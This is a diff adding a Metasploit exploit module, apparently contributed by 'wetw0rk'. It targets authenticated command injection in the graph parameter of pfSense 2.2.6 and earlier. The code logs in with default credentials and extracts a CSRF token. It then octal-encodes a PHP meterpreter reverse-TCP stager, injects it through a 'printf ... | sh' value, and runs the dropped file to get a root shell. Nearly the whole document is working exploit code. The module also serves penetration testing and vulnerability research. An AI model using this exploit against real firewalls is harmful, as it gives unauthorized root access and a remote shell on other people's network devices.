pfsense graph sploit

Author: wetw0rk

modules/exploits/unix/http/pfsense_graph_injection_exec.rb

@@ -0,0 +1,181 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'        => 'pfSense authenticated graph status RCE',
+        'Description' => %q(
+          pfSense, a free BSD based open source firewall distribution,
+          version <= 2.2.6 contains a remote command execution
+          vulnerability post authentication in the _rrd_graph_img.php page.
+          The vulnerability occurs via the graph GET parameter. A non-administrative
+          authenticated attacker can inject arbitrary operating system commands
+          and execute them as the root user. Verified against 2.2.6, 2.2.5, and 2.1.3.
+        ),
+        'Author'      =>
+          [
+            'Security-Assessment.com', # discovery
+            'Milton Valencia',         # metasploit module <wetw0rk>
+            'Jared Stephens',          # python script     <mvrk>
+          ],
+        'References'  =>
+          [
+            [ 'EDB', '39709' ],
+            [ 'URL', 'http://www.security-assessment.com/files/documents/advisory/pfsenseAdvisory.pdf']
+          ],
+        'License'        => MSF_LICENSE,
+        'Privileged'     => true,
+        'DefaultOptions' =>
+          {
+            'SSL'         => true,
+            'Encoder'     => 'php/base64',
+            'PAYLOAD'     => 'php/meterpreter/reverse_tcp',
+          },
+
+        'DisclosureDate' => 'Apr 18, 2016',
+        'Platform'       => 'php',
+        'Arch'           => ARCH_PHP,
+        'Targets'        => [[ 'Automatic Target', { }]],
+        'DefaultTarget'  => 0,
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('USERNAME',  [ true, 'User to login with', 'admin']),
+        OptString.new('PASSWORD',  [ true, 'Password to login with', 'pfsense']),
+        Opt::RPORT(443)
+      ], self.class
+    )
+  end
+
+  def login
+    res = send_request_cgi(
+      'uri' => '/index.php',
+      'method' => 'GET'
+    )
+    fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
+    fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200
+
+    /var csrfMagicToken = "(?<csrf>sid:[a-z0-9,;:]+)";/ =~ res.body
+    fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine CSRF token") if csrf.nil?
+    vprint_status("CSRF Token for login: #{csrf}")
+
+    res = send_request_cgi(
+      'uri' => '/index.php',
+      'method' => 'POST',
+      'vars_post' => {
+        '__csrf_magic' => csrf,
+        'usernamefld'  => datastore['USERNAME'],
+        'passwordfld'  => datastore['PASSWORD'],
+        'login'        => ''
+      }
+    )
+    unless res
+      fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to authentication request")
+    end
+    if res.code == 302
+      vprint_status("Authentication successful: #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
+      return res.get_cookies
+    else
+      fail_with(Failure::UnexpectedReply, "#{peer} - Authentication Failed: #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
+      return nil
+    end
+  end
+
+  def detect_version(cookie)
+    res = send_request_cgi(
+      'uri' => '/index.php',
+      'method' => 'GET',
+      'cookie' => cookie
+    )
+    unless res
+      fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to authentication request")
+    end
+    /Version.+<strong>(?<version>[0-9\.\-RELEASE]+)[\n]?<\/strong>/m =~ res.body
+    if version
+      print_status("Detected pfSense #{version}, uploading intial payload")
+      return Gem::Version.new(version)
+    end
+    # If the device isn't fully setup, you get stuck at redirects to wizard.php
+    # however, this does NOT stop exploitation strangely
+    print_error("pfSense version not detected or wizard still enabled.")
+    Gem::Version.new('0.0')
+  end
+
+  def exploit
+    begin
+      cookie   = login
+      version  = detect_version(cookie)
+      filename = rand_text_alpha(rand(20))
+
+      # generate the PHP meterpreter payload
+      stager = "echo \'<?php "
+      stager << payload.encode
+      stager << "?>\' > #{filename}"
+      # here we begin the encoding process to
+      # convert the payload to octal! Ugly code
+      # don't look
+      complete_stage = ""
+      for i in 0..(stager.length()-1)
+        if "#{version}" =~ /2.2/
+          complete_stage << "\\\\#{stager[i].ord.to_s(8)}"
+        else
+          complete_stage << "\\#{stager[i].ord.to_s(8)}"
+        end
+      end
+
+      res = send_request_cgi(
+        'uri'      => '/status_rrd_graph_img.php',
+        'method'   => 'GET',
+        'headers'  => {
+          'User-Agent'      => 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0',
+          'Accept'          => '*/*',
+          'Accept-Language' => 'en-US,en;q=0.5',
+          'Accept-Encoding' => 'gzip, deflate',
+          'Origin'          => 'null',
+          'Cookie'          => cookie,
+          'Connection'      => 'close',
+        },
+        'vars_get' => {
+          'database' => '-throughput.rrd',
+          'graph'    => "file|printf '#{complete_stage}'|sh|echo",
+        }
+      )
+
+      if res && res.code == 200
+        print_status("Triggering the payload, root shell incoming...")
+      else
+        print_error("Failed to upload the initial payload...")
+      end
+
+      res = send_request_cgi({
+        'uri'     => '/status_rrd_graph_img.php',
+        'method'  => 'GET',
+        'headers' => {
+          'User-Agent'                => 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0',
+          'Accept'                    => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
+          'Accept-Language'           => 'en-US,en;q=0.5',
+          'Accept-Encoding'           => 'gzip, deflate',
+          'Cookie'                    => cookie,
+          'Connection'                => 'close',
+          'Upgrade-Insecure-Requests' => '1',
+        },
+        'vars_get' => {
+          'database' => '-throughput.rrd',
+          'graph'    => "file|php #{filename}|echo "
+        }
+      })
+      disconnect
+    end
+  end
+end